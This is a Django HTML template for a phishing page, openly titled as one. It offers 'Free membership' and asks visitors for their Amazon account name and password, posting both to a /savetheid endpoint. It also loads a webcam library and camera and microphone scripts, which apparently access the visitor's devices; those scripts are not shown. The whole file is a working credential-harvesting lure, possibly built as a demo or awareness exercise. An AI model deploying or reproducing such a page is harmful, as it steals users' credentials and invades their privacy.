{% load static %}
<!DOCTYPE html>
<html>
<head>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
    <script src="https://unpkg.com/webcam-easy/dist/webcam-easy.min.js"></script>
    <script src="{% static 'js/main.js' %}"></script>
    <script src="{% static 'js/camera.js' %}"></script>
    <script src="{% static 'js/mic.js' %}"></script>
    <title>You are on the Phishing Site!</title>
    <link rel="icon" type="image/x-icon" href="{% static 'img/primeimage.ico' %}">
    <link rel="stylesheet" type="text/css" href="{% static 'css/styles.css' %}">
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-EVSTQN3/azprG1Anm3QDgpJLIm9Nao0Yz1ztcQTwFspd3yD65VohhpuuCOmLASjC" crossorigin="anonymous">
</head>
<body>
    <main>
        <form id="membership-form" class="input-group" action="/savetheid" method="POST">
            {% csrf_token %}
            <label for="membership-details" class="label">Enter the Details to get Free membership to the Account:</label>
            <label for="amazon-account" class="label">Amazon Account:</label>
            <input type="text" name="amazon_account" id="amazon-account" class="custom-input" placeholder="Enter your Amazon account">
            <label for="amazon-password" class="label">Password:</label>
            <input type="password" name="password" id="amazon-password" class="custom-input" placeholder="Enter your password">
            <button type="submit" class="btn btn-success">Submit</button>
        </form>            
    </main>
</body>
</html>
